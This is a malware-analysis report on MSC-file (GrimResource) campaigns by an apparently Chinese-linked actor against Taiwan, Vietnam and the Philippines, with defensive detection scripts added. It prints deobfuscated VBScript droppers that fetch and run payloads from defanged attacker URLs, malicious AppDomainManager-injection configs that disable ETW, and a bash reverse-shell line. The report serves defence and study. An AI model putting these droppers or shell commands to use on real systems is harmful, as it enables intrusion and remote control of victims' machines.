Over the past few months, TG Soft's C.R.A.M. has been monitoring several threat actors abusing MSC files.
The first APT group observed using .MSC files in its attacks was #Kimsuky, in April 2024, as reported by the company Genians.
In May 2024, the same technique was observed being used by the APT group known as #MustangPanda to deliver the #PlugX malware, as reported by NTT.
In June 2024, abuse of .MSC files through the technique called #GrimResource was detected, as reported by Elastic.
TG Soft's C.R.A.M. continued to monitor the situation in the following months, identifying new malware campaigns carried out by an unknown cyber actor, most likely of Chinese origin, targeting Southeast Asia.
Below is the timeline of the monitored attacks:
The first campaign we analyzed is that of August 2, 2024.
[upd 2024-08-26 -> The timeline has been updated: the campaign identified on 2024/08/23 was delivered on 2024/08/19]
Campaign Analysis
Campaign of August 2, 2024
On August 2, 2024, an email campaign was released with the following file attached:
Translating the file name from Chinese to English, the document refers to:
Detailed information on water pollution.msc
The image of the infection chain is shown in the figure:
The MSC file, through the technique known as GrimResource, automatically executes the following obfuscated script:
Deobfuscating it gives the following, more readable script:
Option Explicit
Dim objShell, objFSO, objHTTP
Dim strURL1, strURL2, strURL3, strShowfileURL
Dim strDownloadPath1, strDownloadPath2, strDownloadPath3, strShowfilePath
Dim strExecutablePath
' Second-stage components hosted on an attacker-controlled S3 bucket
strURL1 = "https[:]//wordpresss-data[.]s3[.]me-south-1[.]amazonaws[.]com/oncesvc.exe"
strURL2 = "https[:]//wordpresss-data[.]s3[.]me-south-1[.]amazonaws[.]com/oncesvc.exe.config"
strURL3 = "https[:]//wordpresss-data[.]s3[.]me-south-1[.]amazonaws[.]com/water.txt"
strShowfileURL = "https[:]//wordpresss-data[.]s3[.]me-south-1[.]amazonaws[.]com/ws.pdf"
' Everything is dropped into C:\Users\Public, which is writable by any user
strDownloadPath1 = "C:\Users\Public\oncesvc.exe"
strDownloadPath2 = "C:\Users\Public\oncesvc.exe.config"
strDownloadPath3 = "C:\Users\Public\water.txt"
strShowfilePath = "C:\Users\Public\wrasb.pdf"
strExecutablePath = "C:\Users\Public\oncesvc.exe"
Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
' Each file is fetched only if it is not already on disk
If Not objFSO.FileExists(strDownloadPath1) Then
DownloadFile strURL1, strDownloadPath1
End If
If Not objFSO.FileExists(strDownloadPath2) Then
DownloadFile strURL2, strDownloadPath2
End If
If Not objFSO.FileExists(strDownloadPath3) Then
DownloadFile strURL3, strDownloadPath3
End If
If Not objFSO.FileExists(strShowfilePath) Then
DownloadFile strShowfileURL, strShowfilePath
End If
' Run the signed loader (which picks up the .config next to it), then open the decoy PDF
objShell.Run strExecutablePath, 1, True
objShell.Run strShowfilePath, 1, True
' Synchronous HTTP GET via MSXML2.XMLHTTP, body written to disk with ADODB.Stream
Sub DownloadFile(url, path)
Dim objStream
Set objStream = CreateObject("ADODB.Stream")
objHTTP.Open "GET", url, False
objHTTP.Send
If objHTTP.Status = 200 Then
objStream.Open
objStream.Type = 1 ' adTypeBinary
objStream.Write objHTTP.ResponseBody
objStream.SaveToFile path, 2 ' adSaveCreateOverWrite
objStream.Close
End If
Set objStream = Nothing
End Sub
The script downloads the following files into the C:\Users\Public folder:
- oncesvc.exe (legitimate, signed Microsoft "ClickOnce" binary)
- oncesvc.exe.config (configuration file that makes oncesvc.exe load the malicious DLL)
- water.txt (unused file, probably used to track infections)
- ws.pdf (decoy, saved locally as wrasb.pdf)
Below we see the images of the decoy PDF file:
The oncesvc.exe.config file contains the following configuration:
<configuration>
  <runtime>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <assemblyIdentity name="oncesvc" publicKeyToken="205fcab1ea048820" culture="neutral" />
        <codeBase version="" href="https[:]//360photo[.]oss-cn-hongkong[.]aliyuncs[.]com/202407111985.jpeg"/>
      </dependentAssembly>
    </assemblyBinding>
    <etwEnable enabled="false" />
    <appDomainManagerAssembly value="oncesvc, Version=, Culture=neutral, PublicKeyToken=205fcab1ea048820" />
    <appDomainManagerType value="oncesvc" />
  </runtime>
</configuration>
This configuration makes the .NET runtime load the attacker's assembly from https[:]//360photo[.]oss-cn-hongkong[.]aliyuncs[.]com/202407111985.jpeg as the AppDomainManager of the process (the AppDomainManager Injection technique): the legitimate, signed oncesvc.exe runs attacker code before its own entry point, and the etwEnable setting switches off the runtime's ETW tracing, blinding telemetry-based detections.
The malicious DLL, running inside the ONCESVC.EXE process, downloads a 64-bit shellcode from https[:]//360photo[.]oss-cn-hongkong[.]aliyuncs[.]com/202407111522.jpeg and executes it entirely in memory, without ever writing it to disk.
The figure shows the AES decryption of the obfuscated URL and the creation of the thread that runs the downloaded shellcode:
The shellcode uses a custom DJB2 hash to resolve the API names it needs (the hash, not the name, is embedded in the code), as shown in the figure:
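The API-hash resolution described above, as an added example that is not part of the TG Soft analysis: a Python DJB2 hasher together with the analyst-side resolver that labels the hashes read from the shellcode's call sites. The page describes the shellcode's variant only as a "custom DJB2", so the seed (5381) and multiplier (33) are the classic constants and are exposed as parameters; the candidate export list and the "observed" hashes are constructed for the demonstration.

```python
# Added example (not from the TG Soft analysis): resolving DJB2-family
# API-name hashes of the kind used by the shellcode described above.

def djb2(name, seed=5381, mult=33):
    """DJB2 over the ASCII bytes of `name`, truncated to 32 bits the way
    shellcode does it.  seed/mult are parameters because the page describes
    the shellcode's variant only as a "custom DJB2"; the defaults are the
    classic constants (assumption)."""
    h = seed
    for byte in name.encode("ascii"):
        h = (h * mult + byte) & 0xFFFFFFFF
    return h

def build_hash_table(api_names, seed=5381, mult=33):
    """Precompute hash -> canonical name.  Besides the plain name, hash the
    NUL-terminated and upper-cased forms too: real implementations differ on
    whether they include the terminator or fold case."""
    table = {}
    for name in api_names:
        for variant in (name, name + "\x00", name.upper()):
            table.setdefault(djb2(variant, seed, mult), name)
    return table

def resolve_hashes(observed, table):
    """Label each hash lifted from the shellcode; None when no candidate
    export produced it (extend the candidate list in that case)."""
    return {h: table.get(h) for h in observed}

# Constructed candidate list: exports a downloader/loader stub typically resolves.
CANDIDATE_EXPORTS = [
    "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualProtect",
    "CreateThread", "WaitForSingleObject", "InternetOpenA", "InternetOpenUrlA",
    "InternetReadFile", "InternetCloseHandle", "ExitProcess",
]

if __name__ == "__main__":
    table = build_hash_table(CANDIDATE_EXPORTS)
    # Constructed "observed" hashes standing in for values copied from the
    # disassembly (derived from the table here so the script runs offline).
    observed = [djb2("VirtualAlloc"), djb2("CreateThread\x00"), 0xDEADBEEF]
    for h, name in resolve_hashes(observed, table).items():
        print(f"0x{h:08X} -> {name or 'unresolved'}")
```

Once the real seed, multiplier and terminator handling are recovered from the disassembly, pass them to build_hash_table and feed it the constants read at each call site; an unresolved hash usually means the candidate list lacks the exports of the module the shellcode walks, so extend it from that module's export table.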
The 64-bit shellcode connects to the domain status[.]s3cloud-azure[.]com on port 8080 and sends a POST request to the path:
/common/oauth2/authorize?client_id=<client ID>
which mimics the Microsoft identity platform's OAuth 2.0 authorization endpoint. The request sent is the following:
The client_id field carries the following information, Base64-encoded:
- username, with a flag indicating whether the account is an Administrator (isAdmin)
- PC name
- process name
- operating system architecture (32- or 64-bit)
- system memory
The shellcode then requests the path /api/v1/homepage/<id>.
If the response received differs from:
then a new shellcode is executed, as shown in the figure:
During the analysis, the shellcode downloaded and executed a third stage containing the Marte Beacon with Cobalt Strike, which connected to static[.]trendmicrotech[.]com on port 8443 (IPv6: 2a06:98c1:3120:0:0:0:0:7) at the following paths:
- GET /etc.clientlibs/microsoft/clientlibs/clientlib-mwf-new/resources/fonts
- POST /OneCollector/1.0
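As an added example (not part of the original analysis), the following Python hunt flags this beacon pattern in proxy logs. It keys on what the page shows: paths that imitate genuine Microsoft endpoints (the /common/oauth2/authorize OAuth endpoint, the microsoft.com clientlib fonts resource and the /OneCollector/1.0 telemetry endpoint) requested from hosts that are not Microsoft's, the lookalike C2 hosts named above, and a client_id that is not a GUID as a real Entra client ID would be. The log lines, the legitimate-host suffix list and the field layout inside the Base64 client_id are constructed assumptions: the page gives the field names but not their encoding.

```python
import base64
import re
from urllib.parse import urlsplit

# Paths the beacon borrows from genuine Microsoft services (from the analysis).
MIMICKED_PATHS = (
    "/common/oauth2/authorize",
    "/api/v1/homepage/",
    "/etc.clientlibs/microsoft/clientlibs/clientlib-mwf-new/resources/fonts",
    "/OneCollector/1.0",
)
# Assumption: hosts on which those paths are expected; tune to your environment.
LEGIT_HOST_SUFFIXES = ("microsoft.com", "microsoftonline.com")
# Lookalike C2 hosts named on the page, refanged for matching.
KNOWN_C2_HOSTS = {
    "status.s3cloud-azure.com",
    "static.trendmicrotech.com",
    "us2.s3bucket-azure.online",
}
GUID_RE = re.compile(r"^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)

def is_legit_host(host):
    return any(host == s or host.endswith("." + s) for s in LEGIT_HOST_SUFFIXES)

def raw_query_param(query, name):
    """Manual split: parse_qs would turn '+' (a Base64 character) into a space."""
    for kv in query.split("&"):
        k, _, v = kv.partition("=")
        if k == name:
            return v
    return ""

def decode_fake_client_id(value):
    """A real Entra client_id is a GUID.  Return the decoded payload if the
    value is instead a Base64 blob (as the beacon's host profile is), else None."""
    if not value or GUID_RE.match(value):
        return None
    try:
        raw = base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
    except (ValueError, TypeError):
        return None
    return raw.decode("utf-8", "replace")

def check_request(url):
    """Return the list of reasons a single request looks like this beacon."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    reasons = []
    if host in KNOWN_C2_HOSTS:
        reasons.append(f"known C2 host {host}")
    if any(parts.path.startswith(p) for p in MIMICKED_PATHS) and not is_legit_host(host):
        reasons.append(f"Microsoft-style path {parts.path} on non-Microsoft host {host}")
    if parts.path == "/common/oauth2/authorize":
        profile = decode_fake_client_id(raw_query_param(parts.query, "client_id"))
        if profile is not None:
            reasons.append(f"non-GUID client_id decodes to: {profile}")
    return reasons

def hunt(log_lines):
    """Constructed log format: '<ts> <client> <method> <url> <status>'.
    Returns (line_index, reason) pairs."""
    findings = []
    for i, line in enumerate(log_lines):
        fields = line.split()
        if len(fields) < 5:
            continue
        for reason in check_request(fields[3]):
            findings.append((i, reason))
    return findings

# Constructed host profile standing in for the fields the page lists
# (username/isAdmin, PC name, process, architecture, memory); the real
# encoding of these fields is not documented on the page.
FAKE_CLIENT_ID = base64.b64encode(
    b"user=alice;isAdmin=0;pc=WS-042;proc=oncesvc.exe;arch=64;mem=16GB"
).decode()

LOG_LINES = [  # constructed sample lines
    f"2024-08-02T09:12:01Z 10.1.2.3 POST http://status.s3cloud-azure.com:8080/common/oauth2/authorize?client_id={FAKE_CLIENT_ID} 200",
    "2024-08-02T09:12:02Z 10.1.2.3 GET http://status.s3cloud-azure.com:8080/api/v1/homepage/7 200",
    "2024-08-02T09:13:10Z 10.1.2.3 GET https://static.trendmicrotech.com:8443/etc.clientlibs/microsoft/clientlibs/clientlib-mwf-new/resources/fonts 200",
    "2024-08-02T09:13:11Z 10.1.2.3 POST https://static.trendmicrotech.com:8443/OneCollector/1.0 200",
    "2024-08-02T09:14:00Z 10.1.2.4 GET https://login.microsoftonline.com/common/oauth2/authorize?client_id=12345678-1234-1234-1234-123456789abc 302",
    "2024-08-02T09:14:01Z 10.1.2.4 POST https://mobile.events.data.microsoft.com/OneCollector/1.0 200",
]

if __name__ == "__main__":
    for idx, reason in hunt(LOG_LINES):
        print(f"line {idx}: {reason}")
```

The host-based rules catch only this actor's current infrastructure; the path-on-wrong-host rule and the non-GUID client_id rule survive a change of domains, which is why they are worth keeping even after the hosts above go dark.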
This version of Cobalt Strike created the following named pipe:
The August 2 campaign targeted the Taiwan government as reported by
Campaign of July 16, 2024
On July 16, 2024, the file Cert.msc was uploaded to VirusTotal from Vietnam.
This is presumed to be the threat actor's first campaign exploiting the GrimResource technique.
The MSC file contains an obfuscated script from which the following is obtained:
Option Explicit
Dim objShell, objFSO, objHTTP
Dim strURL1, strURL2
Dim strDownloadPath1, strDownloadPath2
Dim strExecutablePath
strURL1 = "https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Cert.exe"
strURL2 = "https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Cert.exe.config"
strDownloadPath1 = "C:\Users\Public\Music\Cert.exe"
strDownloadPath2 = "C:\Users\Public\Music\Cert.exe.config"
strExecutablePath = "C:\Users\Public\Music\Cert.exe"
Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
If Not objFSO.FileExists(strDownloadPath1) Then
DownloadFile strURL1, strDownloadPath1
End If
If Not objFSO.FileExists(strDownloadPath2) Then
DownloadFile strURL2, strDownloadPath2
End If
objShell.Run strExecutablePath, 1, True
Sub DownloadFile(url, path)
Dim objStream
Set objStream = CreateObject("ADODB.Stream")
objHTTP.Open "GET", url, False
If objHTTP.Status = 200 Then
objStream.Type = 1 ' adTypeBinary
objStream.Write objHTTP.ResponseBody
objStream.SaveToFile path, 2 ' adSaveCreateOverWrite
End If
Set objStream = Nothing
End Sub
The infection chain of this campaign retrieves the following files from the same bucket (the script inside the MSC file itself downloads only Cert.exe and Cert.exe.config; the other two are fetched by the later stages):
- https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Cert.exe.config
- https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Cert.exe
- https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/ServiceHub.json
- https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/205fcab1ea04882.jpg
The following files were not available during the analysis:
Cert.exe is presumed to be a renamed copy of the legitimate ServiceHub.Host.netfx.x64.exe program (a Visual Studio component).
The Cert.exe.config file contains the following configuration:
<configuration>
  <runtime>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <assemblyIdentity name="ServiceHub" publicKeyToken="205fcab1ea048820" culture="neutral" />
        <codeBase version="" href="https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/ServiceHub.json"/>
      </dependentAssembly>
    </assemblyBinding>
    <etwEnable enabled="false" />
    <appDomainManagerAssembly value="ServiceHub, Version=, Culture=neutral, PublicKeyToken=205fcab1ea048820" />
    <appDomainManagerType value="ServiceHub" />
  </runtime>
</configuration>
Presumably, ServiceHub.json is the malicious DLL loaded through the AppDomainManager Injection technique, while 205fcab1ea04882.jpg (its name reuses the first 15 hex digits of the publicKeyToken in the configuration) directly contains the Marte Beacon with Cobalt Strike, which connected to us2[.]s3bucket-azure[.]online (IPv6: 2a06:98c1:3120:0:0:0:0:7) at the path "/etc.clientlibs/microsoft/clientlibs/clientlib-mwf-new/resources/fonts".
The July 16, 2024 campaign did not use the 64-bit shellcode seen in the August 2 campaign, but instead directly executed the Marte Beacon with Cobalt Strike, as shown in the figure:
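An added check, not code from the TG Soft analysis, that covers both the oncesvc.exe.config of the August 2 campaign and the Cert.exe.config of this July 16 campaign: a Python parser that flags the AppDomainManager Injection indicators in a .NET application configuration file (an appDomainManagerAssembly/appDomainManagerType override, a codeBase pointing at a remote URL, ETW switched off, and the publicKeyToken shared by both campaigns), plus a directory walk that applies it to every *.exe.config sitting next to an .exe, the layout every campaign on the page uses. The sample configuration is reconstructed from the page; the version numbers are assumptions and the href is refanged; the benign configuration is constructed.

```python
import os
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

ASM_NS = "{urn:schemas-microsoft-com:asm.v1}"
# publicKeyToken shared by the configurations in the campaigns on the page: a pivot value.
KNOWN_TOKENS = {"205fcab1ea048820"}

def inspect_config(xml_text):
    """Return a list of AppDomainManager-injection indicators found in a
    .NET application configuration (<exe>.config) document."""
    findings = []
    runtime = ET.fromstring(xml_text).find("runtime")
    if runtime is None:
        return findings
    adm_asm = runtime.find("appDomainManagerAssembly")
    adm_type = runtime.find("appDomainManagerType")
    if adm_asm is not None or adm_type is not None:
        asm = adm_asm.get("value") if adm_asm is not None else None
        typ = adm_type.get("value") if adm_type is not None else None
        findings.append(f"appDomainManager override: assembly={asm!r} type={typ!r}")
    # codeBase lives under assemblyBinding/dependentAssembly, in the asm.v1 namespace
    for cb in runtime.iter(ASM_NS + "codeBase"):
        href = cb.get("href", "")
        if urlsplit(href).scheme.lower() in ("http", "https", "ftp"):
            findings.append(f"remote codeBase: {href}")
    for ident in runtime.iter(ASM_NS + "assemblyIdentity"):
        token = (ident.get("publicKeyToken") or "").lower()
        if token in KNOWN_TOKENS:
            findings.append(f"publicKeyToken {token} seen in this actor's campaigns")
    etw = runtime.find("etwEnable")
    if etw is not None and etw.get("enabled", "").lower() == "false":
        findings.append('ETW disabled via <etwEnable enabled="false">')
    return findings

def scan_tree(root_dir):
    """Walk a directory (e.g. C:\\Users\\Public) and inspect every *.exe.config
    that sits next to a same-named .exe.  Returns {path: findings}."""
    hits = {}
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if name.lower().endswith(".exe.config") and name[:-7] in files:
                path = os.path.join(dirpath, name)
                try:
                    with open(path, encoding="utf-8-sig") as fh:
                        findings = inspect_config(fh.read())
                except (OSError, ET.ParseError):
                    continue
                if findings:
                    hits[path] = findings
    return hits

# Reconstructed from the August 2 oncesvc.exe.config on the page; version
# numbers are assumptions and the href is refanged.  Nothing is fetched.
SAMPLE_CONFIG = """<configuration>
  <runtime>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <assemblyIdentity name="oncesvc" publicKeyToken="205fcab1ea048820" culture="neutral" />
        <codeBase version="1.0.0.0" href="https://360photo.oss-cn-hongkong.aliyuncs.com/202407111985.jpeg" />
      </dependentAssembly>
    </assemblyBinding>
    <etwEnable enabled="false" />
    <appDomainManagerAssembly value="oncesvc, Version=1.0.0.0, Culture=neutral, PublicKeyToken=205fcab1ea048820" />
    <appDomainManagerType value="oncesvc" />
  </runtime>
</configuration>"""

# Constructed benign configuration: ordinary runtime settings, no loader overrides.
BENIGN_CONFIG = """<configuration>
  <startup>
    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.8" />
  </startup>
  <runtime>
    <gcServer enabled="true" />
  </runtime>
</configuration>"""

if __name__ == "__main__":
    for label, cfg in (("sample", SAMPLE_CONFIG), ("benign", BENIGN_CONFIG)):
        print(label, inspect_config(cfg) or "clean")
```

Treat the appDomainManager override and a remote codeBase as high-confidence on their own when the .exe beside the config is a signed Microsoft binary in a user-writable path; the token match is an attribution pivot for this actor rather than a general rule.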
Campaign of August 12, 2024
On August 12, 2024, the file Document_new.pdf.msc was uploaded to VirusTotal from Vietnam.
The MSC file contains an obfuscated script from which the following is obtained:
Option Explicit
Dim objShell, objFSO, objHTTP
Dim strURL1, strURL2, strURL3, strShowfileURL
Dim strDownloadPath1, strDownloadPath2, strDownloadPath3, strShowfilePath
Dim strExecutablePath
strURL1 = "https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/a85f760d1f9cd374.json"
strURL2 = "https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/a85f760d1f9cd374.config"
strURL3 = "https[:]//yitoo[.]oss-cn-hongkong[.]aliyuncs[.]com/calc.exe"
strShowfileURL = "https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Document_new.pdf"
strDownloadPath1 = "C:\Windows\Temp\Service.exe"
strDownloadPath2 = "C:\Windows\Temp\Service.exe.config"
strDownloadPath3 = "C:\Users\Public\win.ini"
strShowfilePath = "C:\Users\Public\Documents\Documents.pdf"
strExecutablePath = "C:\Windows\Temp\Service.exe"
Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
If Not objFSO.FileExists(strDownloadPath1) Then
DownloadFile strURL1, strDownloadPath1
End If
If Not objFSO.FileExists(strDownloadPath2) Then
DownloadFile strURL2, strDownloadPath2
End If
If Not objFSO.FileExists(strDownloadPath3) Then
DownloadFile strURL3, strDownloadPath3
End If
If Not objFSO.FileExists(strShowfilePath) Then
DownloadFile strShowfileURL, strShowfilePath
End If
objShell.Run strExecutablePath, 1, False
objShell.Run strShowfilePath, 1, False
Sub DownloadFile(url, path)
Dim objStream
Set objStream = CreateObject("ADODB.Stream")
objHTTP.Open "GET", url, False
If objHTTP.Status = 200 Then
objStream.Type = 1 ' adTypeBinary
objStream.Write objHTTP.ResponseBody
objStream.SaveToFile path, 2 ' adSaveCreateOverWrite
End If
Set objStream = Nothing
End Sub
The only component we had access to was the calc.exe file, which is stored in the Public folder under the name win.ini.
It was not possible to recover most of the other files used in the attack during the analysis.
Campaign of August 15, 2024
On August 15, 2024, the file readme(解压密码).msc (解压密码 means "extraction password") was uploaded to VirusTotal.
The MSC file contains an obfuscated script from which the following output is obtained:
Option Explicit
Dim objShell, objFSO, objHTTP
Dim strURL1, strURL2, strURL3, strShowfileURL
Dim strDownloadPath1, strDownloadPath2, strDownloadPath3, strShowfilePath
Dim strExecutablePath
strURL1 = "https[:]//app-dimensiona[.]s3[.]sa-east-1[.]amazonaws[.]com/oncesvc.exe"
strURL2 = "https[:]//bjj-files-production[.]s3[.]sa-east-1[.]amazonaws[.]com/msedge.dll"
strURL3 = "https[:]//app-dimensiona[.]s3[.]sa-east-1[.]amazonaws[.]com/oncesvc.exe.config"
strShowfileURL = "https[:]//app-dimensiona[.]s3[.]sa-east-1[.]amazonaws[.]com/readme.docx"
strDownloadPath1 = "C:\Users\Public\oncesvc.exe"
strDownloadPath2 = "C:\Users\Public\msedge.dll"
strDownloadPath3 = "C:\Users\Public\oncesvc.exe.config"
strShowfilePath = "C:\Users\Public\readme.docx"
strExecutablePath = "C:\Users\Public\oncesvc.exe"
Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
If Not objFSO.FileExists(strDownloadPath1) Then
DownloadFile strURL1, strDownloadPath1
End If
If Not objFSO.FileExists(strDownloadPath2) Then
DownloadFile strURL2, strDownloadPath2
End If
If Not objFSO.FileExists(strDownloadPath3) Then
DownloadFile strURL3, strDownloadPath3
End If
If Not objFSO.FileExists(strShowfilePath) Then
DownloadFile strShowfileURL, strShowfilePath
End If
objShell.Run strExecutablePath, 1, True
objShell.Run strShowfilePath, 1, True
Sub DownloadFile(url, path)
Dim objStream
Set objStream = CreateObject("ADODB.Stream")
objHTTP.Open "GET", url, False
If objHTTP.Status = 200 Then
objStream.Type = 1 ' adTypeBinary
objStream.Write objHTTP.ResponseBody
objStream.SaveToFile path, 2 ' adSaveCreateOverWrite
End If
Set objStream = Nothing
End Sub
This campaign is similar to the August 2 one: oncesvc.exe is used to load the malicious DLL, here downloaded from https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/af7ffc2a629a1c258336fde8a1f71e0a.json.
The malicious DLL downloads the 64-bit shellcode from https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/2472dca8c48ab987e632e66caabf86502bf3.xml.
The 64-bit shellcode is similar to the one seen on August 2; the command and control server in this case is
The POST body used in this case is:
{"user":"password1"}, slightly different from the August 2 campaign.
Again the shellcode downloaded the Marte Beacon with Cobalt Strike, which turned out to be the same version seen in the August 2 campaign.
Campaign of August 20, 2024
On August 20, 2024, the file "Hướng dẫn và yêu cầu kiểm tra, giám sát hoạt động của từng đơn vị năm 2024.msc" was uploaded to VirusTotal.
The campaign targets Vietnam: translated from Vietnamese, the file name reads "Instructions and requirements for inspection and supervision of the activities of each unit in 2024".
The MSC file is similar to those seen in the previous campaigns, with ONCESVC.EXE replaced by MUSICV.EXE.
The configuration file is the same as in the August 15 campaign; the same 64-bit shellcode is downloaded and the same Marte Beacon with Cobalt Strike follows.
The decoy, on the theme "Vietnam Oil and Gas", is interesting:
Campaign of August 19, 2024
On August 23, 2024, the file "贵州电视台张青副台长腐败内部视频证据.msc" was uploaded to VirusTotal.
The campaign may be targeting France and was delivered on August 19, 2024; the file name translated from Chinese reads "Internal Video Evidence of Corruption of Deputy Director Zhang Qing of Guizhou TV Station.msc".
The MSC file is similar to the one seen in the August 20 campaign, where the MUSICV.EXE program is used.
During the analysis it was not possible to download the malicious DLL from https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/af7ffc2a629a1c258336fde8a1f71e0a.json; the link is the same as in the August 20 campaign.
The MSC file contains an obfuscated script from which the following output is obtained:
Option Explicit
Dim objShell, objFSO, objHTTP
Dim strURL1, strURL2, strURL3, strShowfileURL
Dim strDownloadPath1, strDownloadPath2, strDownloadPath3, strShowfilePath
Dim strExecutablePath
strURL1 = "https[:]//proradead[.]s3[.]sa-east-1[.]amazonaws[.]com/new.exe"
strURL2 = "https[:]//proradead[.]s3[.]sa-east-1[.]amazonaws[.]com/new.exe.config"
strURL3 = "https[:]//proradead[.]s3[.]sa-east-1[.]amazonaws[.]com/new.txt"
strShowfileURL = "http[:]//152[.]42[.]226[.]161/stime/1x.mp4"
strDownloadPath1 = "C:\Users\Public\Music\musicx.exe"
strDownloadPath2 = "C:\Users\Public\Music\musicx.exe.config"
strDownloadPath3 = "C:\Users\Public\Music\music.txt"
strShowfilePath = "C:\Users\Public\proton.mp4"
strExecutablePath = "C:\Users\Public\Music\musicx.exe"
Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
If Not objFSO.FileExists(strDownloadPath1) Then
DownloadFile strURL1, strDownloadPath1
End If
If Not objFSO.FileExists(strDownloadPath2) Then
DownloadFile strURL2, strDownloadPath2
End If
If Not objFSO.FileExists(strDownloadPath3) Then
DownloadFile strURL3, strDownloadPath3
End If
If Not objFSO.FileExists(strShowfilePath) Then
DownloadFile strShowfileURL, strShowfilePath
End If
objShell.Run strExecutablePath, 1, False
objShell.Run strShowfilePath, 1, False
Sub DownloadFile(url, path)
Dim objStream
Set objStream = CreateObject("ADODB.Stream")
objHTTP.Open "GET", url, False
If objHTTP.Status = 200 Then
objStream.Type = 1 ' adTypeBinary
objStream.Write objHTTP.ResponseBody
objStream.SaveToFile path, 2 ' adSaveCreateOverWrite
End If
Set objStream = Nothing
End Sub
Below are some screenshots of the decoy video downloaded from
The ZIP archive sent by email, which contains the file 贵州电视台张青副台长腐败内部视频证据.msc, also includes the document 贵州电视台内部领导张青副台长腐败内幕.docx ("Inside story of the corruption of Deputy Director Zhang Qing, internal leader of Guizhou TV Station"), shown below:
Other campaigns in April and May 2024
Analysis of the third stage (the Marte Beacon with Cobalt Strike) allowed us to associate the threat actor with three other campaigns launched between April and May 2024:
- April 27, 2024 (Philippines)
- May 7, 2024 (Philippines)
- May 17, 2024 (Vietnam)
These campaigns were not distributed through MSC files.
The Marte Beacon with Cobalt Strike could be retrieved from the following URL: http://43.199.33[.]246:443/payload.bin
Pivoting on the IP 43.199.33[.]246, the April 27 campaign was identified through an executable named x1ffjiqd.exe, which downloaded and executed the following files (note the plaintext HTTP on port 443):
- http://43.199.33[.]246:443/payload.bin
- http://43.199.33[.]246:443/example.pdf
The payload.bin file is the Marte Beacon with Cobalt Strike, with C&C server visualstudio-microsoft[.]com on port 443.
The following decoy was used in the April 27 campaign:
The following decoy was used in the May 7 campaign:
In the May 17 campaign the following decoy was used with the name example.docx:
The IP address 43.199.33[.]246 is also associated with a Linux ELF file that runs the following bash script, which fetches a backdoor and opens a reverse shell to the same IP on port 4433:
whoami > /tmp/test
curl -o /tmp/google_usb_ssh -s https[:]//xianggang000[.]oss-cn-hongkong[.]aliyuncs[.]com/linshi/grrond
chmod 777 /tmp/google_usb_ssh
rm /tmp/google_usb_ssh
bash -i >& /dev/tcp/43[.]199[.]33[.]246/4433 0>&1
wget https[:]//download[.]chrorne[.]com/error.logs
gedit error.logs /dev/null -c /bin/sh
The threat actor probably needed to hit a Linux target. This bash script mirrors the behaviour of the VBScript used inside the MSC files for Windows: download, execute, then show a decoy, which here is an email message contained in the error.logs file, opened with gedit.
The campaigns appear to primarily target government agencies and critical infrastructure in Southeast Asia, with particular focus on the Philippines, Vietnam and Taiwan.
From August 2 onwards, the threat actor added a new module to its infection chain: a 64-bit shellcode that leads to the execution of a third stage with the Marte and Cobalt Strike beacons.
The modus operandi of the cyber actor reflects the techniques of APTs of Chinese origin; the group was observed operating Monday to Friday, during hours consistent with the Chinese time zone.
Although it was not possible to make a precise attribution, it could be a subgroup of
Ing. Gianfranco Tonello, Michele Zuin